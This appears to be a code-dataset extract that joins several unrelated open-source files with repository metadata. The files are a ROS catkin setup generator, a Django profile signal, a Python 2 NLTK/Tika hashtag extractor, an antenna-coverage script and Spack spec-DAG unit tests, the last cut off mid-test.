parser.add_argument('--normalization', type=str, default='instancenorm')
parser.add_argument('--activation', type=str, default='leakyrelu')
parser.add_argument('--batch_size',
type=int,
default=32,
metavar='N',
                      help='input batch size for training (default: 32)')
parser.add_argument('--epochs',
type=int,
default=100,
metavar='N',
                      help='number of epochs to train (default: 100)')
parser.add_argument('--loss',
type=str,
default='bce',
help='loss function to use')
parser.add_argument('--lr',
type=float,
default=0.001,
metavar='LR',
help='learning rate (default: 0.001)')
parser.add_argument('--gamma',
type=float,
default=0.7,
metavar='M',
help='Learning rate step gamma (default: 0.7)')
parser.add_argument('--no_cuda',
action='store_true',
default=False,
help='disables CUDA training')
parser.add_argument('--dry_run',
action='store_true',
default=False,
help='quickly check a single pass')
parser.add_argument('--seed',
type=int,
default=42,
metavar='S',
help='random seed (default: 42)')
parser.add_argument('--patch_dim',
type=int,
default=64,
help='patch dimension (default: 64)')
parser.add_argument('--upsampler_stride',
type=int,
default=1,
help='Upsampler stride size (default: 1)')
parser.add_argument('--n_patches',
type=int,
default=500,
help='number of patches to generate per sample')
parser.add_argument('--merge_scan_type',
action='store_true',
help='treat FLAIR, T1 and T2 as an image with 3 channels')
parser.add_argument('--scan_input',
action='store_true',
help='feed entire scan to model instead of patches')
parser.add_argument('--save_plots',
action='store_true',
help='save TensorBoard figures and images to disk.')
parser.add_argument('--save_upsampled_image',
action='store_true',
help='saves upsampled images to disk. This is only '
'activated if save_plots is True.')
parser.add_argument('--dpi',
type=int,
default=120,
help='DPI of matplotlib figures')
parser.add_argument('--clear_output_dir',
action='store_true',
help='overwrite existing output directory')
parser.add_argument('--mixed_precision',
action='store_true',
help='use mixed precision compute')
parser.add_argument('--verbose', choices=[0, 1, 2], default=1, type=int)
params = parser.parse_args()
# create output directory
params.output_dir = Path(params.output_dir)
params.output_dir.mkdir(parents=True, exist_ok=True)
main(params)
| 36.456098
| 80
| 0.543855
|
5711d67506695bfaec17428f766dab03b47acf1c
| 1,362
|
py
|
Python
|
build/caster_description/catkin_generated/generate_cached_setup.py
|
FProgrammerLIU/caster_man_ros
|
a75b503fad3a470f985072a2b3953e89074f3223
|
[
"MIT"
] | null | null | null |
build/caster_description/catkin_generated/generate_cached_setup.py
|
FProgrammerLIU/caster_man_ros
|
a75b503fad3a470f985072a2b3953e89074f3223
|
[
"MIT"
] | null | null | null |
build/caster_description/catkin_generated/generate_cached_setup.py
|
FProgrammerLIU/caster_man_ros
|
a75b503fad3a470f985072a2b3953e89074f3223
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/home/caster/ros_ws/caster/devel;/opt/ros/melodic".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/caster/ros_ws/caster/devel/.private/caster_description/env.sh')
output_filename = '/home/caster/ros_ws/caster/build/caster_description/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| 43.935484
| 105
| 0.742291
|
8052b0a3950461145e9592cb2d2f258efacfc17b
| 425
|
py
|
Python
|
authors/apps/authentication/signals.py
|
Kasulejoseph/ah-backend-athena
|
016810d6a2391ae45985b4d43003e51ada1e81be
|
[
"BSD-3-Clause"
] | null | null | null |
authors/apps/authentication/signals.py
|
Kasulejoseph/ah-backend-athena
|
016810d6a2391ae45985b4d43003e51ada1e81be
|
[
"BSD-3-Clause"
] | 31
|
2018-11-26T17:42:35.000Z
|
2022-03-11T23:36:55.000Z
|
authors/apps/authentication/signals.py
|
Kasulejoseph/ah-backend-athena
|
016810d6a2391ae45985b4d43003e51ada1e81be
|
[
"BSD-3-Clause"
] | 6
|
2018-11-23T09:55:02.000Z
|
2021-06-17T15:18:49.000Z
|
from django.db.models.signals import post_save
from django.dispatch import receiver
from authors.apps.profiles.models import Profile
from .models import User
@receiver(post_save, sender=User)
def create_related_profile(sender, instance, created, *args, **kwargs):
"""
Create a user profile when signal is run
"""
if instance and created:
instance.profile = Profile.objects.create(user=instance)
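# Hedged usage sketch (not part of the original module): saving a new User
# fires post_save, so the receiver above attaches a Profile automatically.
# The field names passed to create() are assumptions for illustration only.
def _example_profile_autocreation():  # pragma: no cover
    user = User.objects.create(username="athena", email="athena@example.com")
    return Profile.objects.filter(user=user).exists()  # expected: True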
| 25
| 71
| 0.745882
|
0aef38ae5e27af6b02f354d1821a5129492f610a
| 9,305
|
py
|
Python
|
hashtagger/hashtagger.py
|
nichelia/docker-hashtagger
|
43e16144f2939f79b60f1e1d84b58f6be5af067d
|
[
"MIT"
] | 1
|
2018-11-22T11:05:35.000Z
|
2018-11-22T11:05:35.000Z
|
hashtagger/hashtagger.py
|
nichelia/docker-hashtagger
|
43e16144f2939f79b60f1e1d84b58f6be5af067d
|
[
"MIT"
] | null | null | null |
hashtagger/hashtagger.py
|
nichelia/docker-hashtagger
|
43e16144f2939f79b60f1e1d84b58f6be5af067d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import sys, os, urllib, time, logging
import nltk
import tika
tika.initVM()
from texttable import Texttable
from tika import parser
script_name = 'hashtagger.py'
logging.getLogger().setLevel(logging.INFO)
class FileInterpreter:
"""
Responsible for reading a file,
using either python io or
Apache Tika.
Extracts frequent words and
the sentences they are found in.
"""
def __init__(self, filename=''):
self.filename = filename # Hold filename
self.content = None # Hold extracted content of file
self.frequent_words = None # Hold most common occurring words
# Hold sentences of most common occurring words
self.sentences_of_frequent_words = None
if not filename:
logging.warn('%s:FileInterpreter: Failed to create object,'\
' no filename given', script_name)
else:
# Ready to parse file
self.parse()
def parse(self):
"""
File parser.
Using python io if text file (.txt),
Apache Tika otherwise.
Saves contents in variable.
"""
try:
if self.filename.endswith('.txt'):
file = open( self.filename, 'r' )
raw_content = file.read().decode('utf8')
file.close()
else:
file = parser.from_file( self.filename )
# Only interested in the content
raw_content = file['content']
self.content = raw_content
except Exception as e:
logging.warn('%s:FileInterpreter: Failed to read/extract'\
'contents from file %s', script_name, self.filename)
logging.error(e, exc_info=True)
pass
def extract_frequent_words(self, number_of_words=0):
"""
Extract words from content, collect and clean to
produce most frequent words array. Persist in
a set of the word along with its frequency.
"""
if not self.content:
logging.info('%s:FileInterpreter: Cannot compute frequency '\
'of words, file %s content is empty.',
script_name, self.filename)
return
# Parse content and separate words (tokenise words)
# To avoid duplicates, we transform them all to lower case.
tokenized_words = nltk.tokenize.word_tokenize( self.content.lower() )
# Since we are using English, we use stopwords
# defined in the english language.
english_stopwords = nltk.corpus.stopwords.words('english')
# Clean our word collection.
# Exclude stopwords, single-character words and
# non alphabetic.
clean_tokenized_words = ( w.lower()
for w in tokenized_words
if w.isalpha()
if len(w)>1
if w.lower() not in english_stopwords )
# Compute frequency of our clean word collection.
frequency_words = nltk.FreqDist( w.lower()
for w in clean_tokenized_words )
# If a number of words to return is given (n),
if (number_of_words):
# then return the (n) most common words
self.frequent_words = frequency_words.most_common(number_of_words)
else:
# otherwise return all words in ascending order of higher frequency.
self.frequent_words = frequency_words.most_common()
def extract_sentences_of_frequent_words(self):
"""
Extract senteces from content, for each collected
frequent word, match senteces that include it and
persist in an array.
"""
if not self.frequent_words:
logging.info('%s:FileInterpreter: Cannot find sentences of '\
'frequent words, file %s does not have frequent '\
'words.', script_name, self.filename)
return
sentences_of_frequent_words = []
# Parse content and separate sentences (tokenise sentences)
tokenized_sentences = nltk.tokenize.sent_tokenize( self.content )
# For every word we collected as frequent,
for word in self.frequent_words:
# Check if word is included in sentence
word_matched_sentences = [ sentence
for sentence in tokenized_sentences
if word[0] in nltk.tokenize
.word_tokenize( sentence.lower() ) ]
sentences_of_frequent_words.append(word_matched_sentences)
self.sentences_of_frequent_words = sentences_of_frequent_words
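# Hedged illustration (not part of the original module): the tokenise ->
# filter -> FreqDist pipeline used by FileInterpreter.extract_frequent_words,
# run on a one-line string. Requires the nltk 'punkt' and 'stopwords' data.
def _example_frequent_words(text="the cat sat on the mat, the cat slept"):
    words = nltk.tokenize.word_tokenize(text.lower())
    stop = nltk.corpus.stopwords.words('english')
    clean = (w for w in words if w.isalpha() and len(w) > 1 and w not in stop)
    return nltk.FreqDist(clean).most_common(2)  # e.g. [('cat', 2), ('sat', 1)]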
class Hashtagger:
"""
Responsible for extracting hashtags
from the FileInterpreter objects, merges
them and generates a table as output.
"""
def __init__(self, file_interpreters=[], hashtags_per_doc=0):
self.file_interpreters = file_interpreters
self.hashtags_per_doc = hashtags_per_doc
self.data_structure = {}
if not file_interpreters:
logging.warn('%s:Hashtagger: Failed to create object,'\
' no file interpreters given', script_name)
else:
# Ready to extract hashtags from FileInterpreter objects.
self.extract_hashtags()
def extract_hashtags(self):
"""
Creates a data structure, that includes
all the words across all the files along with
the files found in, their frequency and their sentences.
"""
# For every file,
for file_interpreter in self.file_interpreters:
# extract frequent words
if self.hashtags_per_doc:
file_interpreter.extract_frequent_words(self.hashtags_per_doc)
else:
file_interpreter.extract_frequent_words()
# and their sentences
file_interpreter.extract_sentences_of_frequent_words()
if ( not file_interpreter.frequent_words or
not file_interpreter.sentences_of_frequent_words ):
logging.info('%s:Hashtagger: Cannot generate hashtags, '\
'frequent words and/or their sentences are '\
'missing. (file: %s)',
script_name, file_interpreter.filename)
return
# For every frequent word,
for index in range( 0, len(file_interpreter.frequent_words) ):
# collect filename, word, frequency and sentences it's included.
file = file_interpreter.filename
word = ( file_interpreter.frequent_words[index][0] ).encode('utf-8')
freq = file_interpreter.frequent_words[index][1]
sentences = file_interpreter.sentences_of_frequent_words[index]
# Persist in a data structure dictionary.
if word in self.data_structure:
# Include new file found
self.data_structure[word][1] = ( self.data_structure[word][1] +
'\n' + file +
' (' + str(freq) + ')' )
# Include new sentences found
self.data_structure[word][2].append(sentences)
else:
# Create a new array of format:
tmp = [ word, file + ' (' + str(freq) + ')', sentences ]
self.data_structure[word] = tmp
def print_findings(self):
"""
Prepare data for a table and display it.
"""
# Specify our table headers as the first array of data.
data = [ ['#','In document (frequency)','Snippets'] ]
if not self.data_structure:
logging.info('%s:Hashtagger: Cannot print table, '\
'data are missing.', script_name)
return
# Append arrays to data array.
for value in self.data_structure.values():
data.append(value)
# Using texttable, draw a table with the
# data array.
viewer = Texttable()
viewer.add_rows(data)
print '\n' + viewer.draw() + '\n'
def main(template_filepath=''):
"""
Creates FileInterpreter objects for every document
    found in the given directory (template_filepath).
Also creates a Hashtagger object to analyse all the
documents and print out a table with findings.
"""
file_interpreters = []
if template_filepath:
        # Omit any system files starting with '.'
template_filenames = [ (template_filepath + '/' + f)
for f in os.listdir( template_filepath )
if not f.startswith('.') ]
if not template_filenames:
logging.warn('%s: Directory contains no documents.', script_name)
return
# For every document listed,
# create a file interpreter object.
for filename in template_filenames:
file_interpreters.append( FileInterpreter(filename) )
# Create hashtagger object to handle documents and print results.
# Hashtagger configured to only extract
# the 10 most common occurring words.
max_words = 10
hashtagger_obj = Hashtagger( file_interpreters, max_words)
hashtagger_obj.print_findings()
else:
        logging.warn('%s: No directory given.', script_name)
if __name__ == '__main__':
start_timer = time.time()
if ( len(sys.argv) != 2 ):
raise Exception( '\nUsage: python {0:} <template_filepath>'\
'\n\twith: <template_filepath> the directory'\
                         ' of the documents to apply hashtags to.\n'
.format(script_name) )
main(sys.argv[1])
end_timer=time.time()
elapsed_time=end_timer-start_timer
logging.info('%s: Executed in %f seconds.',
script_name, elapsed_time)
| 33.351254
| 77
| 0.634605
|
d9538c23afc0b8114d752d003964759024af39a3
| 4,252
|
py
|
Python
|
circlecover/compute_antenna_cover.py
|
usnistgov/esc-antenna-cover
|
1bd391bc8095a2b9b277a453d3b7a19a6300a84c
|
[
"Unlicense"
] | 1
|
2021-02-19T22:22:22.000Z
|
2021-02-19T22:22:22.000Z
|
circlecover/compute_antenna_cover.py
|
usnistgov/esc-antenna-cover
|
1bd391bc8095a2b9b277a453d3b7a19a6300a84c
|
[
"Unlicense"
] | null | null | null |
circlecover/compute_antenna_cover.py
|
usnistgov/esc-antenna-cover
|
1bd391bc8095a2b9b277a453d3b7a19a6300a84c
|
[
"Unlicense"
] | 1
|
2019-11-21T02:38:17.000Z
|
2019-11-21T02:38:17.000Z
|
# This software was developed by employees of the National Institute
# of Standards and Technology (NIST), an agency of the Federal
# Government. Pursuant to title 17 United States Code Section 105, works
# of NIST employees are not subject to copyright protection in the United
# States and are considered to be in the public domain. Permission to freely
# use, copy, modify, and distribute this software and its documentation
# without fee is hereby granted, provided that this notice and disclaimer
# of warranty appears in all copies.
#
# THE SOFTWARE IS PROVIDED 'AS IS' WITHOUT ANY WARRANTY OF ANY KIND,
# EITHER EXPRESSED, IMPLIED, OR STATUTORY, INCLUDING, BUT NOT LIMITED
# TO, ANY WARRANTY THAT THE SOFTWARE WILL CONFORM TO SPECIFICATIONS, ANY
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE,
# AND FREEDOM FROM INFRINGEMENT, AND ANY WARRANTY THAT THE DOCUMENTATION
# WILL CONFORM TO THE SOFTWARE, OR ANY WARRANTY THAT THE SOFTWARE WILL BE
# ERROR FREE. IN NO EVENT SHALL NASA BE LIABLE FOR ANY DAMAGES, INCLUDING,
# BUT NOT LIMITED TO, DIRECT, INDIRECT, SPECIAL OR CONSEQUENTIAL DAMAGES,
# ARISING OUT OF, RESULTING FROM, OR IN ANY WAY CONNECTED WITH THIS
# SOFTWARE, WHETHER OR NOT BASED UPON WARRANTY, CONTRACT, TORT, OR
# OTHERWISE, WHETHER OR NOT INJURY WAS SUSTAINED BY PERSONS OR PROPERTY
# OR OTHERWISE, AND WHETHER OR NOT LOSS WAS SUSTAINED FROM, OR AROSE OUT
# OF THE RESULTS OF, OR USE OF, THE SOFTWARE OR SERVICES PROVIDED HEREUNDER.
#
# Distributions of NIST software should also include copyright and licensing
# statements of any third-party software that are legally bundled with
# the code in compliance with the conditions of those licenses.
import antennacover
import excessarea
import argparse
import simannealer
import printcover
if __name__ == "__main__":
# Read and parse the args.
parser = argparse.ArgumentParser()
parser.add_argument("-dist", type=int, default=0, help = "Min sensor spacing (km) default 0")
parser.add_argument("-gs", type=int, default=400, help = "Grid size (default 400)")
parser.add_argument("-pr", help="Definition of protected region units in meters",required=True)
parser.add_argument("-ap", help = "Definition of antenna patterns unit in Km.",required=True)
parser.add_argument("-anneal", type = int, default=0, help="Number of steps to run the annealer")
parser.add_argument("-of",default="output", help = "Output file name prefix")
parser.add_argument("-to",type=float,default=.005, help = "outage tolerance (default = .005)")
args = parser.parse_args()
protection_region = args.pr
do_anneal = args.anneal != 0
coverage_file = args.ap
min_ctr_dist = args.dist
output_file = args.of
grid_size = args.gs
tol = args.to
antennacover.NDIVISIONS=grid_size
# Load up the data.
with open (protection_region, "r") as myfile:
data=myfile.readlines()
# Units are in Km. This should be converted to json format.
esc_loc_x = [x/1000.0 for x in eval(data[0])]
esc_loc_y = [x/1000.0 for x in eval(data[1])]
ship_loc_x = [x/1000.0 for x in eval(data[2])]
ship_loc_y = [x/1000.0 for x in eval(data[3])]
possible_centers = []
for i in range(0,len(esc_loc_x)):
center = (esc_loc_x[i],esc_loc_y[i])
possible_centers.append(center)
interference_contour = []
for i in range(0,len(ship_loc_x)):
p = (ship_loc_x[i],ship_loc_y[i])
interference_contour.append(p)
    bounding_polygon = excessarea.generate_bounding_polygon(possible_centers, interference_contour)
testName = output_file
cover = antennacover.min_antenna_area_cover_greedy(possible_centers, bounding_polygon, coverage_file, min_center_distance=min_ctr_dist,tol=tol)
printcover.printAntennaCover(output_file,bounding_polygon, possible_centers, cover,coverage_file,min_ctr_dist)
if do_anneal:
annealr = simannealer.SimAnneal(bounding_polygon, possible_centers, coverage_file,cover,steps=args.anneal,tol=tol)
annealr.anneal()
cover = annealr.get_result()
printcover.printAntennaCover(output_file + "Anneal", bounding_polygon, possible_centers, cover,coverage_file,min_ctr_dist)
| 48.873563
| 147
| 0.742239
|
080f26000d833a55f84b4e1565db72fd73295f9d
| 32,753
|
py
|
Python
|
lib/spack/spack/test/spec_dag.py
|
mtmiller/spack
|
c97c135f1dbe24955048fcc4f0f98281ef0c9300
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2018-11-16T02:42:57.000Z
|
2019-06-06T19:18:50.000Z
|
lib/spack/spack/test/spec_dag.py
|
mtmiller/spack
|
c97c135f1dbe24955048fcc4f0f98281ef0c9300
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 32
|
2020-12-15T17:29:20.000Z
|
2022-03-21T15:08:31.000Z
|
lib/spack/spack/test/spec_dag.py
|
mtmiller/spack
|
c97c135f1dbe24955048fcc4f0f98281ef0c9300
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2021-07-19T20:31:27.000Z
|
2021-07-19T21:14:14.000Z
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
These tests check Spec DAG operations using dummy packages.
"""
import pytest
import spack.architecture
import spack.error
import spack.package
import spack.util.hash as hashutil
from spack.dependency import Dependency, all_deptypes, canonical_deptype
from spack.spec import Spec
from spack.util.mock_package import MockPackageMultiRepo
def check_links(spec_to_check):
for spec in spec_to_check.traverse():
for dependent in spec.dependents():
assert spec.name in dependent.dependencies_dict()
for dependency in spec.dependencies():
assert spec.name in dependency.dependents_dict()
@pytest.fixture()
def saved_deps():
"""Returns a dictionary to save the dependencies."""
return {}
@pytest.fixture()
def set_dependency(saved_deps):
"""Returns a function that alters the dependency information
for a package in the ``saved_deps`` fixture.
"""
def _mock(pkg_name, spec, deptypes=all_deptypes):
"""Alters dependence information for a package.
Adds a dependency on <spec> to pkg. Use this to mock up constraints.
"""
spec = Spec(spec)
# Save original dependencies before making any changes.
pkg = spack.repo.get(pkg_name)
if pkg_name not in saved_deps:
saved_deps[pkg_name] = (pkg, pkg.dependencies.copy())
cond = Spec(pkg.name)
dependency = Dependency(pkg, spec, type=deptypes)
pkg.dependencies[spec.name] = {cond: dependency}
return _mock
@pytest.mark.usefixtures('config')
def test_test_deptype():
"""Ensure that test-only dependencies are only included for specified
packages in the following spec DAG::
w
/|
x y
|
z
w->y deptypes are (link, build), w->x and y->z deptypes are (test)
"""
default = ('build', 'link')
test_only = ('test',)
mock_repo = MockPackageMultiRepo()
x = mock_repo.add_package('x', [], [])
z = mock_repo.add_package('z', [], [])
y = mock_repo.add_package('y', [z], [test_only])
w = mock_repo.add_package('w', [x, y], [test_only, default])
with spack.repo.use_repositories(mock_repo):
spec = Spec('w')
spec.concretize(tests=(w.name,))
assert ('x' in spec)
assert ('z' not in spec)
@pytest.mark.usefixtures('config')
def test_installed_deps():
"""Preinstall a package P with a constrained build dependency D, then
concretize a dependent package which also depends on P and D, specifying
that the installed instance of P should be used. In this case, D should
not be constrained by P since P is already built.
"""
# FIXME: this requires to concretize build deps separately if we are
# FIXME: using the clingo based concretizer
if spack.config.get('config:concretizer') == 'clingo':
pytest.xfail('requires separate concretization of build dependencies')
default = ('build', 'link')
build_only = ('build',)
mock_repo = MockPackageMultiRepo()
e = mock_repo.add_package('e', [], [])
d = mock_repo.add_package('d', [], [])
c_conditions = {
d.name: {
'c': 'd@2'
},
e.name: {
'c': 'e@2'
}
}
c = mock_repo.add_package('c', [d, e], [build_only, default],
conditions=c_conditions)
b = mock_repo.add_package('b', [d, e], [default, default])
mock_repo.add_package('a', [b, c], [default, default])
with spack.repo.use_repositories(mock_repo):
c_spec = Spec('c')
c_spec.concretize()
assert c_spec['d'].version == spack.version.Version('2')
c_installed = spack.spec.Spec.from_dict(c_spec.to_dict())
for spec in c_installed.traverse():
setattr(spec.package, 'installed', True)
a_spec = Spec('a')
a_spec._add_dependency(c_installed, default)
a_spec.concretize()
assert a_spec['d'].version == spack.version.Version('3')
assert a_spec['e'].version == spack.version.Version('2')
@pytest.mark.usefixtures('config')
def test_specify_preinstalled_dep():
"""Specify the use of a preinstalled package during concretization with a
transitive dependency that is only supplied by the preinstalled package.
"""
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
c = mock_repo.add_package('c', [], [])
b = mock_repo.add_package('b', [c], [default])
mock_repo.add_package('a', [b], [default])
with spack.repo.use_repositories(mock_repo):
b_spec = Spec('b')
b_spec.concretize()
for spec in b_spec.traverse():
setattr(spec.package, 'installed', True)
a_spec = Spec('a')
a_spec._add_dependency(b_spec, default)
a_spec.concretize()
assert set(x.name for x in a_spec.traverse()) == set(['a', 'b', 'c'])
@pytest.mark.usefixtures('config')
@pytest.mark.parametrize('spec_str,expr_str,expected', [
('x ^y@2', 'y@2', True),
('x@1', 'y', False),
('x', 'y@3', True)
])
def test_conditional_dep_with_user_constraints(spec_str, expr_str, expected):
"""This sets up packages X->Y such that X depends on Y conditionally. It
then constructs a Spec with X but with no constraints on X, so that the
initial normalization pass cannot determine whether the constraints are
met to add the dependency; this checks whether a user-specified constraint
on Y is applied properly.
"""
# FIXME: We need to tweak optimization rules to make this test
# FIXME: not prefer a DAG with fewer nodes wrt more recent
# FIXME: versions of the package
if spack.config.get('config:concretizer') == 'clingo':
pytest.xfail('Clingo optimization rules prefer to trim a node')
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
y = mock_repo.add_package('y', [], [])
x_on_y_conditions = {
y.name: {
'x@2:': 'y'
}
}
mock_repo.add_package('x', [y], [default], conditions=x_on_y_conditions)
with spack.repo.use_repositories(mock_repo):
spec = Spec(spec_str)
spec.concretize()
result = expr_str in spec
assert result is expected, '{0} in {1}'.format(expr_str, spec)
@pytest.mark.usefixtures('mutable_mock_repo', 'config')
class TestSpecDag(object):
def test_conflicting_package_constraints(self, set_dependency):
set_dependency('mpileaks', 'mpich@1.0')
set_dependency('callpath', 'mpich@2.0')
spec = Spec('mpileaks ^mpich ^callpath ^dyninst ^libelf ^libdwarf')
# TODO: try to do something to show that the issue was with
# TODO: the user's input or with package inconsistencies.
with pytest.raises(spack.spec.UnsatisfiableVersionSpecError):
spec.normalize()
def test_preorder_node_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['mpileaks', 'callpath', 'dyninst', 'libdwarf', 'libelf',
'zmpi', 'fake']
pairs = list(zip([0, 1, 2, 3, 4, 2, 3], names))
traversal = dag.traverse()
assert [x.name for x in traversal] == names
traversal = dag.traverse(depth=True)
assert [(x, y.name) for x, y in traversal] == pairs
def test_preorder_edge_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['mpileaks', 'callpath', 'dyninst', 'libdwarf', 'libelf',
'libelf', 'zmpi', 'fake', 'zmpi']
pairs = list(zip([0, 1, 2, 3, 4, 3, 2, 3, 1], names))
traversal = dag.traverse(cover='edges')
assert [x.name for x in traversal] == names
traversal = dag.traverse(cover='edges', depth=True)
assert [(x, y.name) for x, y in traversal] == pairs
def test_preorder_path_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['mpileaks', 'callpath', 'dyninst', 'libdwarf', 'libelf',
'libelf', 'zmpi', 'fake', 'zmpi', 'fake']
pairs = list(zip([0, 1, 2, 3, 4, 3, 2, 3, 1, 2], names))
traversal = dag.traverse(cover='paths')
assert [x.name for x in traversal] == names
traversal = dag.traverse(cover='paths', depth=True)
assert [(x, y.name) for x, y in traversal] == pairs
def test_postorder_node_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['libelf', 'libdwarf', 'dyninst', 'fake', 'zmpi',
'callpath', 'mpileaks']
pairs = list(zip([4, 3, 2, 3, 2, 1, 0], names))
traversal = dag.traverse(order='post')
assert [x.name for x in traversal] == names
traversal = dag.traverse(depth=True, order='post')
assert [(x, y.name) for x, y in traversal] == pairs
def test_postorder_edge_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['libelf', 'libdwarf', 'libelf', 'dyninst', 'fake', 'zmpi',
'callpath', 'zmpi', 'mpileaks']
pairs = list(zip([4, 3, 3, 2, 3, 2, 1, 1, 0], names))
traversal = dag.traverse(cover='edges', order='post')
assert [x.name for x in traversal] == names
traversal = dag.traverse(cover='edges', depth=True, order='post')
assert [(x, y.name) for x, y in traversal] == pairs
def test_postorder_path_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['libelf', 'libdwarf', 'libelf', 'dyninst', 'fake', 'zmpi',
'callpath', 'fake', 'zmpi', 'mpileaks']
pairs = list(zip([4, 3, 3, 2, 3, 2, 1, 2, 1, 0], names))
traversal = dag.traverse(cover='paths', order='post')
assert [x.name for x in traversal] == names
traversal = dag.traverse(cover='paths', depth=True, order='post')
assert [(x, y.name) for x, y in traversal] == pairs
def test_conflicting_spec_constraints(self):
mpileaks = Spec('mpileaks ^mpich ^callpath ^dyninst ^libelf ^libdwarf')
# Normalize then add conflicting constraints to the DAG (this is an
# extremely unlikely scenario, but we test for it anyway)
mpileaks.normalize()
mpileaks._dependencies['mpich'].spec = Spec('mpich@1.0')
mpileaks._dependencies['callpath']. \
spec._dependencies['mpich'].spec = Spec('mpich@2.0')
with pytest.raises(spack.spec.InconsistentSpecError):
mpileaks.flat_dependencies(copy=False)
def test_normalize_twice(self):
"""Make sure normalize can be run twice on the same spec,
and that it is idempotent."""
spec = Spec('mpileaks')
spec.normalize()
n1 = spec.copy()
spec.normalize()
assert n1 == spec
def test_normalize_a_lot(self):
spec = Spec('mpileaks')
spec.normalize()
spec.normalize()
spec.normalize()
spec.normalize()
    def test_normalize_with_virtual_spec(self):
dag = Spec.from_literal({
'mpileaks': {
'callpath': {
'dyninst': {
'libdwarf': {'libelf': None},
'libelf': None
},
'mpi': None
},
'mpi': None
}
})
dag.normalize()
# make sure nothing with the same name occurs twice
counts = {}
for spec in dag.traverse(key=id):
if spec.name not in counts:
counts[spec.name] = 0
counts[spec.name] += 1
for name in counts:
assert counts[name] == 1
def test_dependents_and_dependencies_are_correct(self):
spec = Spec.from_literal({
'mpileaks': {
'callpath': {
'dyninst': {
'libdwarf': {'libelf': None},
'libelf': None
},
'mpi': None
},
'mpi': None
}
})
check_links(spec)
spec.normalize()
check_links(spec)
def test_unsatisfiable_version(self, set_dependency):
set_dependency('mpileaks', 'mpich@1.0')
spec = Spec('mpileaks ^mpich@2.0 ^callpath ^dyninst ^libelf ^libdwarf')
with pytest.raises(spack.spec.UnsatisfiableVersionSpecError):
spec.normalize()
def test_unsatisfiable_compiler(self, set_dependency):
set_dependency('mpileaks', 'mpich%gcc')
spec = Spec('mpileaks ^mpich%intel ^callpath ^dyninst ^libelf'
' ^libdwarf')
with pytest.raises(spack.spec.UnsatisfiableCompilerSpecError):
spec.normalize()
def test_unsatisfiable_compiler_version(self, set_dependency):
set_dependency('mpileaks', 'mpich%gcc@4.6')
spec = Spec('mpileaks ^mpich%gcc@4.5 ^callpath ^dyninst ^libelf'
' ^libdwarf')
with pytest.raises(spack.spec.UnsatisfiableCompilerSpecError):
spec.normalize()
def test_unsatisfiable_architecture(self, set_dependency):
set_dependency('mpileaks', 'mpich platform=test target=be')
spec = Spec('mpileaks ^mpich platform=test target=fe ^callpath'
' ^dyninst ^libelf ^libdwarf')
with pytest.raises(spack.spec.UnsatisfiableArchitectureSpecError):
spec.normalize()
@pytest.mark.parametrize('spec_str', [
'libelf ^mpich', 'libelf ^libdwarf', 'mpich ^dyninst ^libelf'
])
def test_invalid_dep(self, spec_str):
spec = Spec(spec_str)
with pytest.raises(spack.error.SpecError):
spec.concretize()
def test_equal(self):
# Different spec structures to test for equality
flat = Spec.from_literal(
{'mpileaks ^callpath ^libelf ^libdwarf': None}
)
flat_init = Spec.from_literal({
'mpileaks': {
'callpath': None,
'libdwarf': None,
'libelf': None
}
})
flip_flat = Spec.from_literal({
'mpileaks': {
'libelf': None,
'libdwarf': None,
'callpath': None
}
})
dag = Spec.from_literal({
'mpileaks': {
'callpath': {
'libdwarf': {
'libelf': None
}
}
}
})
flip_dag = Spec.from_literal({
'mpileaks': {
'callpath': {
'libelf': {
'libdwarf': None
}
}
}
})
# All these are equal to each other with regular ==
specs = (flat, flat_init, flip_flat, dag, flip_dag)
for lhs, rhs in zip(specs, specs):
assert lhs == rhs
assert str(lhs) == str(rhs)
# Same DAGs constructed different ways are equal
assert flat.eq_dag(flat_init)
# order at same level does not matter -- (dep on same parent)
assert flat.eq_dag(flip_flat)
# DAGs should be unequal if nesting is different
assert not flat.eq_dag(dag)
assert not flat.eq_dag(flip_dag)
assert not flip_flat.eq_dag(dag)
assert not flip_flat.eq_dag(flip_dag)
assert not dag.eq_dag(flip_dag)
def test_normalize_mpileaks(self):
# Spec parsed in from a string
spec = Spec.from_literal({
'mpileaks ^mpich ^callpath ^dyninst ^libelf@1.8.11 ^libdwarf': None
})
# What that spec should look like after parsing
expected_flat = Spec.from_literal({
'mpileaks': {
'mpich': None,
'callpath': None,
'dyninst': None,
'libelf@1.8.11': None,
'libdwarf': None
}
})
# What it should look like after normalization
mpich = Spec('mpich')
libelf = Spec('libelf@1.8.11')
expected_normalized = Spec.from_literal({
'mpileaks': {
'callpath': {
'dyninst': {
